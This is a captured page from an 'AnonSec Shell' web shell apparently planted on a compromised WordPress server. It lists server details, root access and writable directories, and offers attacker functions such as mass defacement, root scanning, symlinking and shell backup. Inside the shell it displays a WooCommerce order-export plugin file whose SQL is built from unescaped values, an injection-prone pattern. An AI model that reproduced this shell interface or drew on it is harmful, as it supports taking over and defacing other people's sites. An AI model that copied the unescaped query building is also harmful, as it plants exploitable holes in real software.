AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.145.83.126   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/wp-all-export/src/WordPress/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/wp-all-export/src/WordPress/OrderQuery.php
<?php

namespace Wpae\WordPress;


class OrderQuery
{
	private $post_id = false;

	public $query = ['post_type' => 'shop_order'];

	public function getOrders($offset = 0, $limit = 0, $post_id = false)
	{
		global $wpdb;

		$query = $this->getQuery($offset, $limit, $post_id);

		return $wpdb->get_results($query);
	}

	public function getQuery($offset = 0, $limit = 0, $post_id = false) {

		if($post_id){
			$this->post_id = $post_id;
		}else if($this->post_id){
			$post_id = $this->post_id;
		}

		// default order_by
		$order_by = ' Order By id ASC ';

		$post_id_where = '';

		// Handle RTE exports.
		if(isset(\XmlExportEngine::$exportOptions['enable_real_time_exports'])
		   && \XmlExportEngine::$exportOptions['enable_real_time_exports']){
			$limit = 1;
			// We want to get the newest order as this is only used when generating an example file.
			$order_by = ' Order By id DESC ';
		}

		// Handle RTE or other exports where a single post_id is provided.
		if($post_id){
			$post_id_where = ' AND id = "'.$post_id.'" ';
		}

		// Order by - allow override
		$order_by = apply_filters('wp_all_export_order_by', $order_by);

		global $wpdb;

		$defaultQuery = "SELECT * FROM {$wpdb->prefix}wc_orders ";

		if(!\PMXE_Plugin::$session) {
			$customWhere = \XmlExportEngine::$exportOptions['whereclause'];
			$customJoins = \XmlExportEngine::$exportOptions['joinclause'];
		} else {
			$customWhere = \PMXE_Plugin::$session->get('whereclause');
			$customJoins = \PMXE_Plugin::$session->get('joinclause');
		}
		if (is_countable($customJoins) && count($customJoins)) {
			foreach($customJoins as $join) {
				$defaultQuery = $defaultQuery . $join;
			}
		}

		$defaultQuery .= " WHERE status != 'auto-draft' AND type = 'shop_order' ";

		$defaultQuery = $defaultQuery . $customWhere . $post_id_where;

		$export_id = $this->get_export_id();
		$export = new \PMXE_Export_Record();
		$export->getById($export_id);

		if ($this->is_export_new_stuff()) {

			if ($export->iteration > 0) {
				$postsToExclude = array();
				$postList = new \PMXE_Post_List();

				$postsToExcludeSql = 'SELECT post_id FROM ' . $postList->getTable() . ' WHERE export_id = %d AND iteration < %d';
				$results = $wpdb->get_results($wpdb->prepare($postsToExcludeSql, $export->id, $export->iteration));

				foreach ($results as $result) {
					$postsToExclude[] = $result->post_id;
				}

				if (count($postsToExclude)) {
					$defaultQuery .= $this->get_exclude_query_where($postsToExclude);
				}
			}
		}


		if ($this->is_export_modfified_stuff() && !empty($export->registered_on)) {

			$export_id = $this->get_export_id();
			$export = new \PMXE_Export_Record();
			$export->getById($export_id);

			$defaultQuery .= $this->get_modified_query_where($export);
		}

		// Add order by
		$defaultQuery = $defaultQuery . $order_by;

		// Don't set a limit when we are filtering by a single ID anyway.
		if (!$post_id && isset($offset) && isset($limit) && $limit) {
			$limit_query = " LIMIT $offset, $limit ";
			$defaultQuery = $defaultQuery . $limit_query;
		}

		return $defaultQuery;

	}

	public function get_exclude_query_where($postsToExclude)
	{
		global $wpdb;

		return " AND ({$wpdb->prefix}wc_orders.id NOT IN (" . implode(',', $postsToExclude) . "))";

	}

	public function get_modified_query_where($export)
	{
		global $wpdb;

		return " AND {$wpdb->prefix}wc_orders.date_updated_gmt > '" . $export->registered_on . "' ";
	}

	/**
	 * @return bool
	 */
	protected function is_export_new_stuff()
	{

		$export_id = $this->get_export_id();

		return (!empty(\XmlExportEngine::$exportOptions['export_only_new_stuff']) &&
		        $export_id);
	}

	/**
	 * @return bool
	 */
	protected function is_export_modfified_stuff()
	{

		$export_id = $this->get_export_id();

		return (!empty(\XmlExportEngine::$exportOptions['export_only_modified_stuff']) &&
		        $export_id);
	}

	private function get_export_id()
	{
		$input = new \PMXE_Input();
		$export_id = $input->get('id', 0);

		if(!$export_id) {
			$export_id = $input->get('export_id', 0);
		}

		return $export_id;
	}

}

Anon7 - 2022
AnonSec Team